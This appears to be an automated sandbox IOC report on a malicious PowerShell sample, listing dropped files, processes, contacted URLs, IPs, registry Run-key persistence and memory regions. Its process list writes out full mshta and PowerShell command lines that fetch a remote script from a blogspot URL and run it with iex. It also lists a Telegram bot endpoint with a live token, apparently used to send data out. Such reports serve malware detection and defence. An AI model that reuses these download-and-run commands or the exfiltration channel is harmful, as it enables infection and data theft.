IOC Report
o3KyzpE7F4.ps1

loading gif

Files

File Path
Type
Category
Malicious
o3KyzpE7F4.ps1
ASCII text, with very long lines (64834)
initial sample
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x0d960b90, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_114f36841bde2782ceb5e919255ae3656018f8_00000000_7261f982-655b-4a37-acb2-62dfc002047e\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_114f36841bde2782ceb5e919255ae3656018f8_00000000_cfb088d1-9e20-4517-9a57-fc120c8b9284\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC12.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC22.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC62.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC71.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\nippleskulcha\thukanthukai.~!!@@!!@@!!~
ASCII text, with very long lines (65535)
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\error[1]
HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\error[1]
HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d0zaed2l.pp3.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edu1cji2.000.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fhcrz10j.ok1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mrbozbkd.tgm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qbvflsbx.dsn.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r5rnlyjj.gop.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_twhwfcos.p4u.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uxwfgjf5.s0j.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QNXL5CJO929GDZJGR1C2.temp
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
There are 17 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\o3KyzpE7F4.ps1"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
malicious
C:\Windows\System32\mshta.exe
C:\Windows\system32\mshta.EXE "javascript:nd=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;
malicious
C:\Windows\System32\mshta.exe
"C:\Windows\system32\mshta.exe" "javascript:ql=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[ql[3
malicious
C:\Windows\System32\mshta.exe
C:\Windows\system32\mshta.EXE "javascript:nd=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;
malicious
C:\Windows\System32\mshta.exe
"C:\Windows\system32\mshta.exe" "javascript:ql=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[ql[3
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 792
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 788
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 9 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://www.blogger.com/feeds/3408437705493384378/posts/default?alt=atom
unknown
https://api.telegram.org
unknown
http://crl.microsoft
unknown
https://contoso.com/License
unknown
http://minecap4-22-24.blogspot.com/haha
142.251.15.132
https://g.live.com/odclientsettings/ProdV2.C:
unknown
http://pubsubhubbub.appspot.com/
unknown
https://api.ipify.org
unknown
http://blogspot.l.googleusercontent.com
unknown
http://schemas.google.com/g/2005
unknown
https://minecap4-22-24.blogspot.com/haha
142.251.15.132
https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendDocument
149.154.167.220
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://ip-api.com
unknown
http://schemas.google.com/g/2005#thumbnail
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://minecap4-22-24.blogspot.com/
unknown
https://api.ipify.org/
172.67.74.152
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
http://www.blogger.com
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://a9.com/-/spec/opensearchrss/1.0/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://img1.blogblog.com/img/b16-rounded.gif
unknown
https://contoso.com/Icon
unknown
https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/
unknown
http://crl.ver)
unknown
http://upx.sf.net
unknown
http://minecap4-22-24.blogspot.com
unknown
https://api.ipify.org/t
unknown
https://minecap4-22-24.blogspot.
unknown
https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendDocumentLR
unknown
https://github.com/Pester/Pester
unknown
https://g.live.com/odclientsettings/Prod/C:
unknown
http://schemas.google.com/blogger/2008
unknown
https://minecap4-22-24.blogspot.com/feeds/posts/default
unknown
http://crl.micro
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://minecap4-22-24.blogspot.com
unknown
https://aka.ms/pscore68
unknown
http://www.georss.org/georss
unknown
http://api.telegram.org
unknown
http://crl.v
unknown
http://www.blogger.com/styles/atom.css
unknown
https://minecap4-22-24.blogspot.com/atom.xml
142.251.15.132
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 40 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
blogspot.l.googleusercontent.com
142.251.15.132
api.ipify.org
172.67.74.152
ip-api.com
208.95.112.1
api.telegram.org
149.154.167.220
fp2e7a.wpc.phicdn.net
192.229.211.108
minecap4-22-24.blogspot.com
unknown

IPs

IP
Domain
Country
Malicious
142.251.15.132
blogspot.l.googleusercontent.com
United States
208.95.112.1
ip-api.com
United States
149.154.167.220
api.telegram.org
United Kingdom
127.0.0.1
unknown
unknown
172.67.74.152
api.ipify.org
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
DRAKEXnew2
malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
DRAKEXnew1
malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
ExecutionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
FileDirectory
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
ProgramId
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
FileId
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
LowerCaseLongPath
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
LongPathHash
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
Name
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
OriginalFileName
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
Publisher
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
Version
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
BinFileVersion
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
BinaryType
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
ProductName
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
ProductVersion
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
LinkDate
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
BinProductVersion
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
AppxPackageFullName
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
AppxPackageRelativeId
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
Size
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
Language
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
IsOsComponent
\REGISTRY\A\{05dcfc43-f9fa-7737-07d5-7d3443dcac53}\Root\InventoryApplicationFile\msbuild.exe|54fceaf629da50c5
Usn
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
There are 43 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
B9D000
remote allocation
page execute and read and write
malicious
286A000
trusted library allocation
page read and write
malicious
2829000
trusted library allocation
page read and write
malicious
287A000
trusted library allocation
page read and write
malicious
15BF000
stack
page read and write
235C6620000
trusted library allocation
page read and write
7FF848DFB000
trusted library allocation
page read and write
261C63F4000
heap
page read and write
738000
stack
page read and write
67C0000
trusted library allocation
page read and write
86943FB000
stack
page read and write
7FF8490C0000
trusted library allocation
page read and write
219E5772000
heap
page read and write
219E6191000
heap
page read and write
7FF849010000
trusted library allocation
page execute and read and write
59F0000
heap
page read and write
211E2C80000
heap
page read and write
1EC28479000
heap
page read and write
2D2AA610000
heap
page execute and read and write
1530000
heap
page read and write
1FCCD249000
heap
page read and write
1F4CB472000
heap
page read and write
869497E000
stack
page read and write
A45000
trusted library allocation
page execute and read and write
4C30000
trusted library allocation
page read and write
43C1000
trusted library allocation
page read and write
219E576C000
heap
page read and write
219E5771000
heap
page read and write
5150000
heap
page read and write
235C6855000
heap
page read and write
86953FE000
unkown
page readonly
2D2C28E0000
heap
page read and write
219E6196000
heap
page read and write
261C4954000
heap
page read and write
1EC28380000
heap
page read and write
8694FFE000
unkown
page readonly
1F42A6A8000
trusted library allocation
page read and write
28E450C9000
heap
page read and write
DB7028C000
stack
page read and write
7FF848FD1000
trusted library allocation
page read and write
48EE000
stack
page read and write
5F1D000
stack
page read and write
219E6196000
heap
page read and write
28E2D09E000
trusted library allocation
page read and write
1130000
heap
page read and write
63A000
stack
page read and write
E440E3E000
stack
page read and write
CAE000
heap
page read and write
28E451B0000
heap
page read and write
28E4530E000
heap
page read and write
86941F9000
stack
page read and write
5020000
trusted library allocation
page read and write
211E463E000
heap
page read and write
235C68FF000
heap
page read and write
1EC28472000
heap
page read and write
219E61BE000
heap
page read and write
2D2AB25C000
trusted library allocation
page read and write
219E57BA000
heap
page read and write
28E2B270000
heap
page readonly
28E45121000
heap
page read and write
211E2DB2000
heap
page read and write
C30BE4E000
stack
page read and write
261C63FE000
heap
page read and write
86956FE000
stack
page read and write
58F0000
heap
page execute and read and write
2F7E000
stack
page read and write
219E57BE000
heap
page read and write
235C1800000
heap
page read and write
7FF848FD0000
trusted library allocation
page execute and read and write
DE0000
heap
page read and write
7FF849090000
trusted library allocation
page read and write
219E57DD000
heap
page read and write
28E2B0C0000
heap
page read and write
86944FE000
unkown
page readonly
2D2AA690000
heap
page read and write
24418B87000
trusted library allocation
page read and write
235C683E000
heap
page read and write
A10000
trusted library allocation
page read and write
219E57CA000
heap
page read and write
235C6663000
trusted library allocation
page read and write
2442A875000
trusted library allocation
page read and write
235C1900000
heap
page read and write
7FF849040000
trusted library allocation
page read and write
7FF848FF0000
trusted library allocation
page read and write
1FCCD24B000
heap
page read and write
8B5000
heap
page read and write
DB6F279000
stack
page read and write
235C20E0000
trusted library allocation
page read and write
AF6000
stack
page read and write
1F4CB3C0000
heap
page read and write
24429D3F000
trusted library allocation
page read and write
FF2000
trusted library allocation
page execute and read and write
9719F9B000
stack
page read and write
2442AD14000
trusted library allocation
page read and write
1EC283C0000
heap
page read and write
14F0000
heap
page read and write
E440AFD000
stack
page read and write
235C6720000
trusted library allocation
page read and write
1EC28480000
heap
page read and write
63BE000
stack
page read and write
2D2AB2F8000
trusted library allocation
page read and write
235C191A000
heap
page read and write
235C680D000
heap
page read and write
1770000
heap
page read and write
1F42A6A0000
trusted library allocation
page read and write
235C6634000
trusted library allocation
page read and write
E44193E000
stack
page read and write
269C6B80000
heap
page read and write
2442AD98000
trusted library allocation
page read and write
7FF849050000
trusted library allocation
page read and write
2D2AACF6000
trusted library allocation
page read and write
10AE000
stack
page read and write
68A0000
trusted library allocation
page execute and read and write
1F42A5B9000
heap
page read and write
60A0000
trusted library allocation
page read and write
235C6862000
heap
page read and write
211E47E0000
heap
page read and write
24417ED6000
heap
page read and write
219E6189000
heap
page read and write
1EC284B3000
heap
page read and write
D04000
heap
page read and write
850000
heap
page read and write
24416170000
heap
page read and write
58BE000
trusted library allocation
page read and write
235C68F6000
heap
page read and write
FCA000
trusted library allocation
page execute and read and write
1F42A700000
trusted library allocation
page execute
28E2B14E000
heap
page read and write
E4406FE000
stack
page read and write
244292D4000
trusted library allocation
page read and write
DB6F0FE000
stack
page read and write
235C6620000
trusted library allocation
page read and write
2A03000
trusted library allocation
page read and write
2D2A8980000
trusted library allocation
page read and write
219E61C3000
heap
page read and write
DB6F339000
stack
page read and write
7FF848DE4000
trusted library allocation
page read and write
E440DBE000
stack
page read and write
1A60000
trusted library allocation
page read and write
33C1000
trusted library allocation
page read and write
F6F000
stack
page read and write
24417F1E000
heap
page read and write
1F42A120000
heap
page read and write
E4408FA000
stack
page read and write
219E61BD000
heap
page read and write
211E2E16000
heap
page read and write
24417A60000
heap
page read and write
C30AEFE000
stack
page read and write
1F42A2E0000
heap
page read and write
2D2AB2F0000
trusted library allocation
page read and write
27B1000
trusted library allocation
page read and write
261C496E000
heap
page read and write
28E450B0000
heap
page read and write
1EC28464000
heap
page read and write
235C125C000
heap
page read and write
219E5770000
heap
page read and write
219E5773000
heap
page read and write
235C128B000
heap
page read and write
7FF848EC6000
trusted library allocation
page execute and read and write
219E5787000
heap
page read and write
E4407FE000
stack
page read and write
C30B0F8000
stack
page read and write
7FF848FE0000
trusted library allocation
page read and write
FD2000
trusted library allocation
page execute and read and write
235C12FE000
heap
page read and write
1EC28690000
trusted library allocation
page read and write
8694AFC000
stack
page read and write
F70000
heap
page read and write
24416235000
heap
page read and write
219E57C4000
heap
page read and write
7FF84911D000
trusted library allocation
page read and write
76252F3000
stack
page read and write
58AB000
trusted library allocation
page read and write
1EC2843F000
heap
page read and write
6720000
trusted library allocation
page read and write
28E3D014000
trusted library allocation
page read and write
E30000
heap
page read and write
7FF848DE2000
trusted library allocation
page read and write
2D2AA8DA000
trusted library allocation
page read and write
1F42A5A1000
heap
page read and write
2D2A89C0000
heap
page read and write
288C000
trusted library allocation
page read and write
E37000
heap
page read and write
86954FB000
stack
page read and write
28E2CF40000
heap
page execute and read and write
E44093E000
stack
page read and write
1F42A5B3000
heap
page read and write
76254FE000
stack
page read and write
28E2DAD1000
trusted library allocation
page read and write
CD8000
heap
page read and write
24416230000
heap
page read and write
2D2AB268000
trusted library allocation
page read and write
2441C085000
trusted library allocation
page read and write
C30C00F000
stack
page read and write
10EE000
stack
page read and write
4C39000
trusted library allocation
page read and write
DB6EEFE000
stack
page read and write
219E5787000
heap
page read and write
261C63F0000
heap
page read and write
2864000
trusted library allocation
page read and write
28E2D090000
trusted library allocation
page read and write
C30ACFE000
stack
page read and write
7FF848E23000
trusted library allocation
page execute and read and write
4C80000
trusted library allocation
page read and write
1EC2848A000
heap
page read and write
219E57A7000
heap
page read and write
7FF849030000
trusted library allocation
page read and write
28E2B240000
trusted library allocation
page read and write
2441AB6C000
trusted library allocation
page read and write
1440000
heap
page read and write
235C1272000
heap
page read and write
28E2D024000
trusted library allocation
page read and write
1FCCD674000
heap
page read and write
DB6F3BB000
stack
page read and write
A42000
trusted library allocation
page read and write
B0E000
heap
page read and write
219E57CD000
heap
page read and write
7FF848FC2000
trusted library allocation
page read and write
235C21E0000
trusted library section
page readonly
2441615C000
heap
page read and write
235C17B0000
trusted library section
page read and write
C30BECD000
stack
page read and write
2D2BA7E1000
trusted library allocation
page read and write
14C0000
heap
page read and write
28E2DAC3000
trusted library allocation
page read and write
29F7000
trusted library allocation
page read and write
219E6161000
heap
page read and write
13B2000
remote allocation
page execute and read and write
219E61B9000
heap
page read and write
1378000
stack
page read and write
7FF848F9A000
trusted library allocation
page read and write
219E61AB000
heap
page read and write
219E616D000
heap
page read and write
4C52000
trusted library allocation
page read and write
235C6560000
trusted library allocation
page read and write
1205000
heap
page read and write
100B000
trusted library allocation
page execute and read and write
24419587000
trusted library allocation
page read and write
F0A000
trusted library allocation
page execute and read and write
16F0000
trusted library allocation
page read and write
8694EFE000
unkown
page readonly
219E4C60000
heap
page read and write
2816000
trusted library allocation
page read and write
54BE8FE000
stack
page read and write
219E4CDF000
trusted library allocation
page read and write
219E57C9000
heap
page read and write
24417A30000
trusted library allocation
page read and write
28E2DA34000
trusted library allocation
page read and write
28E451D0000
heap
page read and write
6A70000
heap
page read and write
7FF849140000
trusted library allocation
page read and write
235C1B91000
trusted library allocation
page read and write
7FF848F00000
trusted library allocation
page execute and read and write
211E2B80000
heap
page read and write
86942FE000
unkown
page readonly
24416115000
heap
page read and write
261C6264000
heap
page read and write
C30C08B000
stack
page read and write
7FF849100000
trusted library allocation
page read and write
2441AB65000
trusted library allocation
page read and write
131D000
heap
page read and write
1EC283F7000
heap
page read and write
1F42B171000
heap
page read and write
28E2B17B000
heap
page read and write
E440FBC000
stack
page read and write
6750000
trusted library allocation
page read and write
235C6740000
trusted library allocation
page read and write
219E61A3000
heap
page read and write
28E452E9000
heap
page read and write
28E2B130000
heap
page read and write
58D7000
trusted library allocation
page read and write
54BE6FF000
stack
page read and write
26A0000
heap
page read and write
2D2C2C30000
heap
page read and write
261C4938000
heap
page read and write
601F000
stack
page read and write
12E0000
heap
page read and write
2866000
trusted library allocation
page read and write
4C5A000
trusted library allocation
page read and write
219E5758000
heap
page read and write
235C6790000
remote allocation
page read and write
24417F43000
heap
page read and write
1F4CB746000
heap
page read and write
219E61AF000
heap
page read and write
A36000
trusted library allocation
page execute and read and write
235C68F0000
heap
page read and write
1F42A589000
trusted library allocation
page read and write
211E2D20000
heap
page read and write
2690000
trusted library allocation
page read and write
219E61B6000
heap
page read and write
7FF848F80000
trusted library allocation
page read and write
869374B000
stack
page read and write
235C684B000
heap
page read and write
143E000
stack
page read and write
211E2D9A000
heap
page read and write
7FF848E96000
trusted library allocation
page read and write
1EC28479000
heap
page read and write
2D2AA8DD000
trusted library allocation
page read and write
235C1313000
heap
page read and write
4467000
trusted library allocation
page read and write
7DF48D450000
trusted library allocation
page execute and read and write
7FF848FDA000
trusted library allocation
page read and write
7FF8490E0000
trusted library allocation
page read and write
261C4949000
heap
page read and write
14D0000
heap
page read and write
219E61C4000
heap
page read and write
7EF00000
trusted library allocation
page execute and read and write
28E452EF000
heap
page read and write
1140000
heap
page read and write
219E57CB000
heap
page read and write
2D2A8850000
heap
page read and write
1F42A024000
heap
page read and write
7FF8490F0000
trusted library allocation
page read and write
7FF849110000
trusted library allocation
page read and write
109E000
stack
page read and write
219E6176000
heap
page read and write
4C40000
trusted library allocation
page read and write
211E4624000
heap
page read and write
2D2C2A8D000
heap
page read and write
E440C37000
stack
page read and write
307E000
stack
page read and write
A60000
trusted library allocation
page read and write
219E61AC000
heap
page read and write
27AE000
stack
page read and write
261C6279000
heap
page read and write
2D2A8AB5000
heap
page read and write
CC0000
heap
page read and write
B48000
heap
page read and write
AB5000
heap
page read and write
2D2C27E0000
heap
page read and write
235C68FB000
heap
page read and write
1EC28471000
heap
page read and write
4CD0000
trusted library allocation
page read and write
7625CFE000
stack
page read and write
28E2D4B1000
trusted library allocation
page read and write
28E2DA64000
trusted library allocation
page read and write
211E2DB6000
heap
page read and write
28E2B136000
heap
page read and write
1750000
trusted library allocation
page read and write
97196FE000
stack
page read and write
1FCCD650000
heap
page read and write
37B1000
trusted library allocation
page read and write
1F42A2E4000
heap
page read and write
1F42A5BA000
heap
page read and write
235C6740000
trusted library allocation
page read and write
7FF848E24000
trusted library allocation
page read and write
2D2AA8E4000
trusted library allocation
page read and write
235C2560000
trusted library allocation
page read and write
E440675000
stack
page read and write
1EC2848A000
heap
page read and write
219E57D4000
heap
page read and write
CAE000
stack
page read and write
76257FE000
stack
page read and write
235C1802000
